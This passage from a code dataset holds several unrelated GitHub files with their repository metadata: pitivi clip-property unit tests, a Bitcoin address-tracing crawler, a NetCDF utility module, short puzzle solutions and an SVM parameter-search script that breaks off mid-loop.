self.assertNotEqual(properties1[\"text\"], properties2[\"text\"])\n\n # Undo modify title.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n # Redo modify title.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_outline_color(self):\n \"\"\"Exercise modifying the outline color.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the outline color.\n mod_outline_color = 0xFFFFFFFF\n color_button_mock = mock.Mock()\n color_picker_mock = mock.Mock()\n color_picker_mock.calculate_argb.return_value = mod_outline_color\n self.clipproperties.title_expander._color_picker_value_changed_cb(color_picker_mock, color_button_mock, \"outline-color\")\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"outline-color\"], (True, mod_outline_color))\n self.assertNotEqual(properties1[\"outline-color\"], properties2[\"outline-color\"])\n\n # Undo modify outline color.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n # Redo modify outline color.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_drop_shadow(self):\n \"\"\"Exercise modifying the drop shadow.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the drop shadow.\n drop_shadow = False\n drop_shadow_checkbox_mock = mock.Mock()\n drop_shadow_checkbox_mock.get_active.return_value = drop_shadow\n self.clipproperties.title_expander._drop_shadow_checkbox_cb(drop_shadow_checkbox_mock)\n\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"draw-shadow\"], (True, drop_shadow))\n self.assertNotEqual(properties1[\"draw-shadow\"], properties2[\"draw-shadow\"])\n\n # Undo modify drop shadow.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n # Redo modify drop shadow.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_selection_does_nothing(self):\n \"\"\"Checks de/selection do not create undoable operations.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n self.clipproperties.create_title_clip_cb(None)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 1, clips)\n\n self.timeline_container.timeline.selection.unselect(clips)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n\n self.timeline_container.timeline.selection.select(clips)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_xxx(self):\n \"\"\"Exercise creating a title clip.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n # Create the first clip.\n self.clipproperties.create_title_clip_cb(None)\n clip1, = self.layer.get_clips()\n source1, = clip1.get_children(False)\n self.clipproperties.title_expander.textbuffer.props.text = \"TC1\"\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n\n # Make place for the second clip at the beginning of the layer.\n clip1.props.start = clip1.props.duration\n\n # Create the second clip.\n self.clipproperties.create_title_clip_cb(None)\n clip2, clip1_ = self.layer.get_clips()\n self.assertIs(clip1_, clip1)\n source2, = clip2.get_children(False)\n self.clipproperties.title_expander.textbuffer.props.text = \"TC2\"\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n\n # Switch back to clip1.\n self.timeline_container.timeline.selection.select([clip1])\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n # Switch back to clip2.\n self.timeline_container.timeline.selection.select([clip2])\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n\nclass ClipPropertiesTest(common.TestCase):\n \"\"\"Tests for the ClipProperties class.\"\"\"\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_alignment_editor(self):\n \"\"\"Exercise aligning a clip using the alignment editor.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n timeline = self.timeline_container.timeline\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n height = source.get_child_property(\"height\").value\n width = source.get_child_property(\"width\").value\n\n self.assertEqual(source.get_child_property(\"posx\").value, 0)\n self.assertEqual(source.get_child_property(\"posy\").value, 0)\n\n alignment_editor = self.transformation_box.alignment_editor\n event = mock.MagicMock()\n event.x = 0\n event.y = 0\n alignment_editor._motion_notify_event_cb(None, event)\n alignment_editor._button_release_event_cb(None, None)\n\n self.assertEqual(source.get_child_property(\"posx\").value, -width)\n self.assertEqual(source.get_child_property(\"posy\").value, -height)\n\n self.action_log.undo()\n\n self.assertEqual(source.get_child_property(\"posx\").value, 0)\n self.assertEqual(source.get_child_property(\"posy\").value, 0)\n\n self.action_log.redo()\n\n self.assertEqual(source.get_child_property(\"posx\").value, -width)\n self.assertEqual(source.get_child_property(\"posy\").value, -height)\n\n\nclass SpeedPropertiesTest(common.TestCase):\n \"\"\"Tests for the TransformationProperties widget.\"\"\"\n\n def assert_applied_rate(self, sources_count, rate, duration):\n self.assertEqual(len(self.speed_box._time_effects), sources_count)\n self.assertEqual(self.speed_box.props.rate, rate)\n self.assertEqual(self.speed_box._clip.props.duration, duration)\n for effect, propname in self.speed_box._time_effects.values():\n self.assertTrue(propname in [\"rate\", \"tempo\"], propname)\n self.assertEqual(effect.get_child_property(propname).value, rate)\n\n self.assertEqual(self.speed_box._speed_adjustment.props.value, rate)\n\n def assert_clip_speed_child_props(self, clip, audio, video, value):\n if audio:\n self.assertEqual(clip.get_child_property(\"tempo\").value, value)\n if video:\n self.assertEqual(clip.get_child_property(\"GstVideoRate::rate\").value, value)\n\n def _check_clip_speed(self, audio=False, video=False):\n sources_count = len([source for source in [audio, video] if source])\n\n clip, = self.layer.get_clips()\n\n duration = self.project.ges_timeline.get_frame_time(self.project.ges_timeline.get_frame_at(Gst.SECOND))\n self.project.ges_timeline.props.snapping_distance = duration\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.timeline_container.timeline.selection.select([clip])\n\n self.assertEqual(len(self.speed_box._sources), sources_count, self.speed_box._sources)\n self.assertEqual(self.speed_box._time_effects, {})\n\n clip.props.duration = duration\n self.assertEqual(self.speed_box._clip.props.duration, duration)\n\n self.speed_box._speed_adjustment.props.value = 2.0\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 1.0, duration)\n\n self.action_log.redo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.action_log.redo()\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.timeline_container.timeline.selection.select([])\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.timeline_container.timeline.selection.select([clip])\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.timeline_container.timeline.selection.select([])\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.action_log.undo()\n self.assert_clip_speed_child_props(clip, audio, video, 1.0)\n\n self.action_log.redo()\n self.assert_clip_speed_child_props(clip, audio, video, 2.0)\n\n self.action_log.redo()\n self.assert_clip_speed_child_props(clip, audio, video, 0.5)\n\n self.timeline_container.timeline.selection.select([clip])\n total_duration = clip.props.duration\n self.project.pipeline.get_position = mock.Mock(return_value=duration)\n self.timeline_container.split_action.activate()\n\n clip1, clip2 = self.layer.get_clips()\n self.assertEqual(clip1.props.start, 0)\n self.assertEqual(clip1.props.duration, duration)\n self.assertEqual(clip2.props.start, duration)\n self.assertEqual(clip2.props.duration, total_duration - duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n # 0.1 would lead to clip1 totally overlapping clip2, ensure it is a noop\n self.speed_box._speed_adjustment.props.value = 0.1\n self.assert_applied_rate(sources_count, 0.5, duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n # Undoing should undo the split\n clip1, = self.layer.get_clips()\n\n # redo the split\n self.action_log.redo()\n clip1, clip2 = self.layer.get_clips()\n self.assertEqual(self.speed_box._clip, clip1)\n self.assert_applied_rate(sources_count, 0.5, duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n self.speed_box._speed_adjustment.props.value = 1.0\n self.assert_applied_rate(sources_count, 1.0, int(duration / 2))\n\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 2)\n\n self.speed_box.set_clip(None)\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n @common.setup_project_with_clips(assets_names=[\"1sec_simpsons_trailer.mp4\"])\n @common.setup_clipproperties\n def test_clip_speed_av(self):\n self._check_clip_speed(audio=True, video=True)\n\n @common.setup_project_with_clips(assets_names=[\"mp3_sample.mp3\"])\n @common.setup_clipproperties\n def test_clip_speed_a(self):\n self._check_clip_speed(audio=True)\n\n @common.setup_project_with_clips(assets_names=[\"30fps_numeroted_frames_blue.webm\"])\n @common.setup_clipproperties\n def test_clip_speed_v(self):\n self._check_clip_speed(video=True)\n\n @common.setup_project_with_clips(assets_names=[\"mp3_sample.mp3\", \"30fps_numeroted_frames_blue.webm\"])\n @common.setup_clipproperties\n def test_widgets_updated_when_switching_clips(self):\n clip1, clip2 = self.layer.get_clips()\n clip1_duration = clip1.props.duration\n clip2_duration = clip2.props.duration\n\n self.timeline_container.timeline.selection.select([clip1])\n self.assertIs(self.speed_box._clip, clip1)\n self.assert_applied_rate(0, 1.0, clip1_duration)\n\n self.speed_box._speed_adjustment.props.value = 2.0\n self.assert_applied_rate(1, 2.0, clip1_duration / 2)\n\n self.timeline_container.timeline.selection.select([clip2])\n self.assertIs(self.speed_box._clip, clip2)\n self.assert_applied_rate(0, 1.0, clip2_duration)\n\n self.timeline_container.timeline.selection.select([clip1])\n self.assert_applied_rate(1, 2.0, clip1_duration / 2)\n\n @common.setup_project_with_clips(assets_names=[\"1sec_simpsons_trailer.mp4\"])\n @common.setup_clipproperties\n def test_load_project_clip_speed(self):\n sources_count = 2\n clip, = self.layer.get_clips()\n clip.props.duration = Gst.SECOND\n\n self.timeline_container.timeline.selection.select([clip])\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, 2 * Gst.SECOND)\n\n with tempfile.NamedTemporaryFile() as temp_file:\n uri = Gst.filename_to_uri(temp_file.name)\n project_manager = self.app.project_manager\n self.assertTrue(project_manager.save_project(uri=uri, backup=False))\n\n mainloop = common.create_main_loop()\n\n project_manager.connect(\"new-project-loaded\", lambda *args: mainloop.quit())\n project_manager.connect(\"closing-project\", lambda *args: True)\n self.assertTrue(project_manager.close_running_project())\n project_manager.load_project(uri)\n mainloop.run()\n\n new_clip, = self.layer.get_clips()\n self.assertNotEqual(new_clip, clip)\n\n self.timeline_container.timeline.selection.select([new_clip])\n self.assert_applied_rate(sources_count, 0.5, 2 * Gst.SECOND)\n","repo_name":"pitivi/pitivi","sub_path":"tests/test_clipproperties.py","file_name":"test_clipproperties.py","file_ext":"py","file_size_in_byte":32171,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"79"} +{"seq_id":"73607758656","text":"import requests\nfrom Struct.prototype import transaction\nfrom log.bitcoin_tracing_logger import Bitcoin_logger\nimport time\n\nurl = 'https://blockchain.info/rawaddr/{}?limit={}&offset={}'\ndef checkaddress(address, proxy):\n time.sleep(1)\n if ' ' in address:\n return False\n tracing_json_data = address_request(address, proxy, 0, 1)\n return 'error' not in tracing_json_data\n\n\ndef get_address_to_trancation(address):\n transaction_class = transaction(address)\n tracing_json_data = address_request(address)\n transaction_class.default_setting(tracing_json_data)\n Bitcoin_logger.get_logger().info('Address : ' + transaction_class.address)\n Bitcoin_logger.get_logger().info('Transaction Count : ' + str(transaction_class.transaction['n_tx']))\n Bitcoin_logger.get_logger().info('Transaction UPDATE : ' + str(len(transaction_class.transaction['txs'])))\n count = tracing_json_data['n_tx']/5000 \n i = 1\n while count>1:\n tracing_json_data = address_request(address, i)\n transaction_class.tranaction_extend(tracing_json_data['txs'])\n Bitcoin_logger.get_logger().info('Transaction UPDATE : ' + str(len(transaction_class.transaction['txs'])))\n count-=1\n i+=1\n transaction_class.point_to_point_filter()\n return transaction_class\n #Data split && Get Informaction\n\ndef address_request(address, proxy_setting, offset=0, limit=5000):\n url = create_url(address, limit, offset)\n Bitcoin_logger.get_logger().info('[Request]Address: {}, limit: {} , offest: {}'.format(address, limit, offset))\n if proxy_setting:\n return proxy_get_address_to_json(url)\n else:\n return get_address_to_json(url)\n\ndef proxy_get_address_to_json(url):\n Bitcoin_logger.get_logger().info('[Proxy]Request URL : ' + url)\n session = requests.session()\n session.proxies = {}\n session.proxies['http'] = 'socks5://localhost:9050'\n session.proxies['https'] = 'socks5://localhost:9050'\n request_headers = { \n \"accept-language\":\t\"ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\",\n \"accept-encoding\":\t\"gzip, deflate, br\",\n \"sec-fetch-dest\":\t\"document\",\n \"sec-fetch-user\": \"1\",\n \"sec-fetch-mode\":\t\"navigate\",\n \"sec-fetch-site\":\t\"none\",\n \"accept\":\t\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"user-agent\":\t\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\",\n \"upgrade-insecure-requests\":\t\"1\",\n \"sec-ch-ua-platform\":\t\"macOS\",\n \"sec-ch-ua-mobile\": \"0\",\n \"sec-ch-ua\":\t'Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96'\n }\n try:\n return session.get(url, headers=request_headers).json()\n except:\n raise Exception(\"Rate Limit Wait Request\")\n\ndef get_address_to_json(url):\n #Bitcoin_logger.get_logger().info('Request URL : ' + url)\n try:\n return requests.get(url).json()\n except:\n raise Exception(\"Rate Limit Wait Request\")\n\ndef create_url(address, limit, offset):\n return url.format(address, limit, offset*limit)\n\nif __name__ == '__main__':\n address = 'bc1qsfxssclfwp3rykwjdl9ghz99j7zmw9yhvdnr2f'\n print(\"ADDRESS : {}\".format(address))\n print(get_address_to_trancation(address))","repo_name":"JangJongMin/Bitcoin_Trace","sub_path":"Module/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10348060939","text":"# pylint: disable=C0103\n\"\"\"\nnchandy\n~~~~~~~~~\nHandy NetCDF tools\n\nThis package contains functions and tools to work with\n NetCDF files.\n\n:github: https://github.com/isezen/nchandy\n:docs: https://github.com/isezen/nchandy\n:author: Ismail SEZEN (sezenismail@gmail.com)\n\"\"\"\n\nfrom math import log10 as _log10\nfrom math import floor as _floor\nimport logging as _logging\nimport numpy as _np\nimport xarray as _xr\n\nfrom nchandy import file\nfrom nchandy.file import _log\n\n__all__ = ['file', ]\n__version__ = '0.0.1.dev'\n__author__ = 'Ismail SEZEN'\n__email__ = 'sezenismail@gmail.com'\n__license__ = 'AGPL v3.0'\n__year__ = '2022'\n\n# fh = _logging.FileHandler(s.log.file)\n# fh.setLevel(logging.INFO)\n# fh.setFormatter(formatter)\n# log.addHandler(fh)\n_log_level_names_ = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n_log_levels_ = dict(zip(_log_level_names_, range(10, 60, 10)))\n_log_formatter_ = _logging.Formatter(\n '%(asctime)s.%(msecs)03d - %(name)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%dT%H:%M:%S')\n\n\ndef _update_is_required_compress(f, quantize=2, dlevel=5):\n \"\"\"Check NetCDF file is compressed or not.\"\"\"\n dp_str = 'precision'\n compression_changed = False\n with _xr.open_dataset(f, engine='netcdf4') as ds:\n for _, v in ds.variables.items():\n if v.encoding['complevel'] != dlevel:\n compression_changed = True\n break\n if dp_str in ds.attrs.keys():\n if ds.attrs[dp_str] is not None and quantize is not None:\n if quantize >= ds.attrs[dp_str]:\n quantize = None\n if quantize is not None:\n compression_changed = True\n return compression_changed\n\n\ndef _update_is_required_regrid(f, lats, lons, dim_names=None):\n \"\"\"Check NetCDF file is regridded previously.\"\"\"\n with _xr.open_dataset(f, engine='netcdf4') as ds:\n latn, lonn = _find_dim_names(ds) if dim_names is None \\\n else tuple(dim_names)\n if 'regrid_method' in ds.attrs.keys(): # if contains attribute\n xlats, xlons = ds[latn].values, ds[lonn].values\n if all(xlats != lats):\n return True\n if all(xlons != lons):\n return True\n else:\n return True\n return False\n\n\ndef _set_logger_(name, verbose=False,\n log_level='INFO', logfile=None) -> None:\n _log.name = name\n _log.setLevel(_log_levels_[log_level])\n if verbose:\n handler = _logging.StreamHandler()\n handler.setFormatter(_log_formatter_)\n _log.addHandler(handler)\n if logfile is not None:\n handler = _logging.FileHandler(logfile)\n handler.setFormatter(_log_formatter_)\n _log.addHandler(handler)\n return _log\n\n\ndef _check_ds(ds) -> None:\n ds_types = (_xr.core.dataset.Dataset,\n _xr.core.dataarray.DataArray,\n _xr.core.variable.Variable)\n if not isinstance(ds, ds_types):\n type_names = [str(i).split(\"'\")[1] for i in ds_types]\n type_names = [f\"'{i}'\" for i in type_names]\n type_names = ' or '.join(type_names)\n raise TypeError(f'ds must be an instance of {type_names}.')\n\n\ndef _check_int(x, name) -> None:\n if x is not None:\n if not isinstance(x, int):\n raise TypeError(f'{name} must be integer')\n\n\ndef _check_dlevel(x) -> None:\n _check_int(x, 'dlevel')\n if x is not None:\n if not 0 <= x <= 9:\n raise ValueError('dlevel must be between (0,9)')\n\n\ndef _exp10(x):\n return max(10**(-_floor(_log10(x))) if x > 0 else 1, 1)\n\n\ndef _exp10_2(x):\n return 10**(-_np.floor(_np.log10(x)))\n\n\ndef is_netcdf(f):\n \"\"\"\n Check file is a valid netcdf file.\n\n Args:\n f (FILENAME): A valid file name\n \"\"\"\n try:\n _xr.open_dataset(f, engine='netcdf4')\n except OSError:\n return False\n return True\n\n\ndef scale_ncdf(nco, factor, variables=None, exclude_variables=('TFLAG',)):\n \"\"\"\n Scale netCDF4.Dataset object.\n\n Args:\n nco (netCDF4.Dataset) : NetCDF4.Dataset object\n factor (FLOAT) : Scale factor.\n variables (str|list) : Name of variables to scale.\n exclude_vars (str| list) : Name of variables to exclude from scaling.\n Default is 'TFLAG'.\n Return:\n netCDF4.Dataset object\n \"\"\"\n try:\n from netCDF4 import Dataset as _Dataset # pylint: disable=E0611,C0415\n if not isinstance(nco, _Dataset):\n raise TypeError(\"nco must be an instance of 'netCDF4.Dataset'\")\n except ImportError:\n print('Install netCDF4 library to use this functionality')\n return None\n\n nco_vars = list(nco.variables.keys())\n if variables is None:\n variables = nco_vars\n for k in variables:\n if k not in nco_vars:\n _log.debug(f'Var:{k} was not found in dataset. Skipping!')\n continue\n if k not in exclude_variables:\n nco[k][:] *= factor\n _log.debug(f'{k} variable scaled by {factor}')\n return nco\n\n\ndef scale_xr(ds, factor, variables=None, exclude_variables=('TFLAG',),\n dlevel=5):\n \"\"\"\n Scale NetCDF File by xarray library.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object.\n factor (FLOAT) : Scale factor.\n variables (str|list) : Name of variables to scale.\n exclude_vars (str| list) : Name of variables to exclude from scaling.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n _check_dlevel(dlevel)\n ds = ds.copy(deep=True)\n if variables is None:\n variables = list(ds.variables)\n # log.debug(f'Scaling {from_file}')\n for k in variables:\n if k not in ds.variables:\n _log.debug(f'Var:{k} was not found in dataset. Skipping!')\n continue\n if k not in exclude_variables:\n encoding, attrs = ds[k].encoding, ds[k].attrs\n ds[k] = ds[k].astype('float64') * factor\n ds[k].encoding, ds[k].attrs = encoding, attrs\n _log.debug(f'{k} variable scaled by {factor}')\n ds[k].attrs['scale_factor'] = factor\n if dlevel is not None:\n for k in ds.keys():\n ds[k].encoding.update(\n {'dtype': _np.dtype('float32'), 'zlib': True,\n 'complevel': dlevel})\n\n return ds\n\n\ndef scale_emis(ds, factor, dlevel=5):\n \"\"\"\n Scale emission File by xarray library.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object.\n factor (FLOAT) : Scale factor.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n return scale_xr(ds, factor,\n file._emis_vars_, # pylint: disable=W0212\n file._exclude_vars_, # pylint: disable=W0212\n dlevel)\n\n\ndef compress(ds, quantize=None, dlevel=5): # pylint: disable=R0912\n \"\"\"\n Compress a single NetCDF File.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object\n quantize (INT) : Decimal precision to truncate data.\n Default is no quantization.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n _check_ds(ds)\n _check_int(quantize, 'quantize')\n _check_dlevel(dlevel)\n pm_str = 'precision_MAE'\n if isinstance(ds, _xr.core.variable.Variable):\n dt = ds.dtype\n old_enc = ds.encoding.copy()\n if str(ds.dtype).startswith('float') and quantize is not None:\n q = 0.0\n mx = ds.max().values.tolist()\n mn = ds.min().values.tolist()\n # if (ds != 0.0).all():\n # m = ds.where(ds != 0.0)\n # mx, mn = m.max().values.tolist(), m.min().values.tolist()\n # q = m.quantile(q=0.90).values.tolist()\n # q = m.mean().values.tolist()\n # q = m.max().values.tolist()\n # e = _exp10_2(abs(m))\n # e = stats.mode(e)\n # vals, counts = _np.unique(e, return_counts=True)\n # index = _np.argmax(counts)\n # e = vals[index]\n # print(e)\n # e = _exp10(abs(q))\n e = 1\n _log.debug(f'Max: {mx}, Min: {mn}, exp: {e}, q: {q}')\n e = _np.array(e).astype('float64')\n r = (_np.round(ds.astype('float64') * e, quantize) / e).astype(dt)\n mae = _np.max(abs(ds - r)).astype(dt)\n r.attrs[pm_str] = mae.values.tolist()\n ds = r\n if dlevel is not None:\n old_enc.update({'zlib': True, 'shuffle': True,\n 'complevel': dlevel})\n ds.encoding = old_enc\n\n if isinstance(ds, _xr.core.dataarray.DataArray):\n v = compress(ds.variable, quantize, dlevel)\n ds = _xr.DataArray(v, name=ds.name, attrs=v.attrs)\n ds.encoding = v.encoding.copy()\n if pm_str in ds.attrs.keys():\n _log.debug(f'Processed {ds.name}: MAE: {ds.attrs[pm_str]}')\n\n if isinstance(ds, _xr.core.dataarray.Dataset):\n ds2 = ds.copy(deep=True)\n glob_mae = 0\n for k in list(ds2.keys()):\n ds2[k] = compress(ds2[k], quantize, dlevel)\n if pm_str in ds2[k].attrs.keys():\n glob_mae = max(glob_mae, ds2[k].attrs[pm_str])\n\n if quantize is not None:\n ds2.attrs.update({'decimal_precision': quantize,\n pm_str: glob_mae})\n _log.info(f'{pm_str}: {glob_mae}')\n return ds2\n return ds\n\n\ndef _find_dim_names(ds, lat_name='lat', lon_name='lon'):\n \"\"\"\n Find exact lat/lon dimension names in xarray dataset.\n\n Args:\n ds (xarray.Dataset) : xarray Dataset object\n lat_name (str) : lat name to search in coords.\n lon_name (str) : lon name to search in coords.\n Return:\n tuple of lat/lon names\n \"\"\"\n dim_names = list(ds.dims.keys())\n coord = {}\n for j in [lat_name, lon_name]:\n dim_name = {j: i for i in dim_names if j in i}\n if len(dim_name) == 0:\n raise ValueError(f'dimension {j} name was not found')\n if len(dim_name) > 1:\n raise ValueError(f'Ambiguous dimension name for {j}')\n coord.update(dim_name)\n return coord[lat_name], coord[lon_name]\n\n\ndef regrid(ds, lats, lons, dim_names=None, # pylint: disable=R0913\n dlevel=5, method='bilinear'):\n \"\"\"\n Regrid xarray dataset.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object\n lats (list) : list of latitude values to regrid.\n lons (list) : list of longitude values to regrid.\n dim_names (list|tuple) : name of lat/lon dimensions.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n method (str) : regridding method. (See xesmf.Regridder)\n Return:\n xarray.Dataset object\n \"\"\"\n # try:\n import xesmf as xe # pylint: disable=E0401,C0415\n # except ImportError:\n # print('*** Install xesmf library to use this functionality ***')\n # return None\n _check_dlevel(dlevel)\n latn, lonn = _find_dim_names(ds) if dim_names is None else tuple(dim_names)\n ds = ds.rename({latn: 'lat', lonn: 'lon'})\n ds2 = _xr.Dataset(\n {\n \"lat\": ([\"lat\"], lats),\n \"lon\": ([\"lon\"], lons),\n }\n )\n regridder = xe.Regridder(ds, ds2, method, periodic=True)\n ds2 = regridder(ds)\n if dlevel is not None:\n for k in ds2.keys():\n ds2[k].encoding.update(\n {'dtype': _np.dtype('float32'), 'zlib': True,\n 'complevel': dlevel})\n return ds2\n","repo_name":"isezen/nchandy","sub_path":"nchandy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26723946948","text":"'''2016년, a월 b일에 해당하는 요일 출력하기'''\n\ndef solution(a, b):\n day = ['FRI', 'SAT','SUN','MON','TUE','WED','THU'] #요일 입력\n date = {1:31, 2:29,3:31,4:30,5:31,6:30,7:31,8:31,9:30,10:31,11:30,12:31} # 딕셔너리를 사용해서 월에 해당하는 일 value 입력\n num =0\n for i in range(1,a): # a-1까지 일을 더하기\n num += date.get(i)\n num = (num+b) % 7 # b만큼 더한 후 7로 나누기\n return day[num-1] # 나머지에 해당하는 값 출력하기\n","repo_name":"bella5065/programmers","sub_path":"2016.py","file_name":"2016.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36655335580","text":"import math\n\nx = int(input())\ny = int(input())\nk = 1\n\nif x == y:\n if x == 1:\n print(1)\n else:\n print(-1)\nelse:\n if x != 1:\n k = math.ceil((x-1)/(y-x))\n print(k*x)\n else:\n print(1)","repo_name":"T1m11/Codeforces","sub_path":"olimp.5.py","file_name":"olimp.5.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73589853376","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport os\nimport math\n\n# Parameters:\n# C: c -- The complexity parameter C.(default 1.0).\n# L: epsilonParameter -- The epsilon parameter of the epsilon insensitive loss function.(default 0.001).\n\n# Process:\n# L = 1.0 static -> Find optimal C -> C = optimal C static -> Find optimal L -> Final Result\n\n# range with float step\n\ndef frange(start, stop, step=1.0):\n while start < stop:\n yield start\n start +=step\n if start >= 0.1:\n step = 0.1\n else:\n step *= 10\n\n# Greedy - Find optimal parameter C for L=1.0 static -> Find optimal parameter L for C=optimalC static\n\nparams = [1.0E-3, 1.0] # [C, L]\ninit = [1.0E-5, 0.1]\nend = [1.0, 1.0]\nstep = [9.0E-5, 0.1]\nexperiments = [14, 10] # C = 0.00001 0.0001 0.001 0.01 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0; L = 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0\n\nFEATURE = \"ComParE2015_Parkinson\"\n# FEATURE = \"New_Data_all\"\n\nif os.path.exists('baseline_svm_arff.sh'):\n\n os.system(\"rm print.dep\")\n\n for cont in range(len(params)):\n values = []\n spearman = []\n string = []\n parallel = \"parallel -j \" + str(experiments[cont]) + \" ./baseline_svm_arff.sh {1} {2} \" + FEATURE\n for i in range(len(params)):\n string.append(\" ::: \" + str(params[i]))\n string[cont] = \" :::\"\n for param in frange(init[cont], end[cont], step[cont]):\n values.append(param)\n string[cont] += \" \" + str(param)\n for i in range(len(params)):\n parallel += string[i]\n f = open(\"print.dep\", \"a\")\n f.write(\"Training \" + parallel + \"\\n\")\n f.close()\n os.system(parallel)\n for exp in range(experiments[cont]):\n params[cont] = values[exp]\n if os.path.exists('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result'):\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Results for model C=\"+str(params[0])+\" L=\"+str(params[1]) + \"\\n\")\n 